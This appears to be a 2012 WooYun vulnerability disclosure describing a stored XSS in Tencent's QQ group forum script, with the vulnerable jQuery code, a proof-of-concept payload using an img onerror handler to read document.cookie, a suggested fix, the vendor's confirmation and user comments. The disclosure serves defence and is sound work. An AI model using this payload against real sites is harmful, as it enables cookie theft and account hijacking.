当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013624

漏洞标题:PKAV腾讯专场 - 4. QQ群论坛存储型XSS

相关厂商:腾讯

漏洞作者: gainover

提交时间:2012-10-20 23:36

修复时间:2012-12-04 23:37

公开时间:2012-12-04 23:37

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-10-20: 细节已通知厂商并且等待厂商处理中
2012-10-23: 厂商已经确认,细节仅向厂商公开
2012-11-02: 细节向核心白帽子及相关领域专家公开
2012-11-12: 细节向普通白帽子公开
2012-11-22: 细节向实习白帽子公开
2012-12-04: 细节向公众公开

简要描述:

QQ群论坛某处代码缺陷导致存储型XSS,记得之前在群里发新帖子,是会有提示告诉群里的“XXX发布了一个新的帖子”,然后可以直接点进去看的,要是一点进去,就被XSS了,多带感~~ 哈哈。 本文会同步至pkav.net

详细说明:

缺陷文件:http://qun.qq.com/god/m/js/bbs.zh-cn.js
缺陷代码:

$('div.blogInfo img').load(function() {
    var obj = $(this),
    title = obj.attr('title'),
    src = obj.attr('src'),
    reg = /src:(http:\/\/.{5,}\.swf),width:(\d+),height:(\d+)/g;
    var match = reg.exec(title);
    if (match && match.length > 0 && /.*\/god\/images\/space\.gif/.test(src)) {
        obj.replaceWith('<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="' + match[2] + '" height="' + match[3] + '"><param name="movie" value="' + match[1] + '" /><param name="quality" value="high" /><embed type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" play="true" loop="true" menu="true" width="' + match[2] + '" height="' + match[3] + '" src="' + match[1] + '" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash"></embed></object>');
        return;
    }
}


成因解析:
1. 程序员在显示FLASH时,是先将FLASH地址存储到了一个临时的img标签的title属性里,而在创建FLASH这个DOM元素时,从title里取出地址时,未进行二次的HTML过滤。从而导致了XSS。
2. 页面输出的临时IMG代码

<div class="blogInfo cl" id="blogInfo">														<img title="src:http://www.1.com/1.swf&quot;&gt;&lt;img/src=&quot;1&quot;onerror=&quot;alert  (document.cookie);&quot;style=&quot;display:none;&quot;&gt;&lt;i/a=&quot;#.swf,width:480,height:320" src="http://s.qun.qq.com/god/images/space.gif" width="480" height="320"  /> <div>


3. title = obj.attr('title'),取出title属性后,其中的&quot;等都自动转义回 " 等符号.
POC:
插入FLASH时,输入以下代码:

http://www.1.com/1.swf&quot;&gt;&lt;img/src=&quot;1&quot;onerror=&quot;alert(document.cookie);&quot;style=&quot;display:none;&quot;&gt;&lt;i/a=&quot;#.swf


然后发表帖子即可。


漏洞证明:


至于怎么利用,不做过多的危害演示啦~~

修复方案:

title = obj.attr('title') 取出title后,进行二次过滤

版权声明:转载请注明来源 gainover@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-10-23 19:12

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

2012-10-25:非常感谢您的报告,目前已经完成对该漏洞的修复,请您帮助复查,有任何问题请联系我们。

漏洞评价:

评论

  1. 2012-10-20 23:56 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    这些评论似乎很乌云~~~思密达

  2. 2012-10-20 23:58 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    这些评论似乎很乌云~~~思密达

  3. 2012-10-21 00:24 | 蓝风 ( 普通白帽子 | Rank:125 漏洞数:25 | 崬汸慾哓 嗼檤焄垳皁 沓猵圊屾亾沬荖 颩憬...)

    这些评论似乎很乌云~~~思密达受害者路过一下

  4. 2012-10-21 00:30 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    这些评论似乎很乌云~~~思密达 感觉这洞很鸡肋 但是很强大。。

  5. 2012-10-21 01:00 | upload ( 普通白帽子 | Rank:251 漏洞数:43 | 此处略--!)

    这些评论似乎很乌云~~~思密达 节奏。。。

  6. 2012-10-21 06:11 | 邪少 ( 实习白帽子 | Rank:58 漏洞数:7 )

    这些评论似乎很乌云~~~思密达

  7. 2012-10-21 10:51 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    这些评论似乎很乌云~~~思密达

  8. 2012-10-23 21:40 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)

    这些评论似乎很乌云~~~思密达 表示 想去找一找

  9. 2012-10-23 23:08 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    这些评论似乎很乌云~~~思密达

  10. 2012-10-24 12:39 | 半世倾尘 ( 路人 | Rank:29 漏洞数:8 | 努力)

    这些评论似乎很乌云~~~思密达

  11. 2012-11-21 00:01 | 革命往事 ( 路人 | Rank:17 漏洞数:2 | 革命已成往事)

    PKAV给力的

  12. 2012-12-05 09:05 | w5r2 ( 普通白帽子 | Rank:226 漏洞数:52 )

    这些评论似乎很乌云~~~思密达

  13. 2012-12-05 09:18 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    @革命往事 这些评论似乎很乌云~~~思密达 表示你不配合。

  14. 2012-12-05 12:17 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    这些评论似乎很乌云~~~思密达

  15. 2012-12-06 04:14 | safe121 ( 实习白帽子 | Rank:98 漏洞数:11 | http://www.gov.cn)

    这些评论似乎很乌云~~~思密达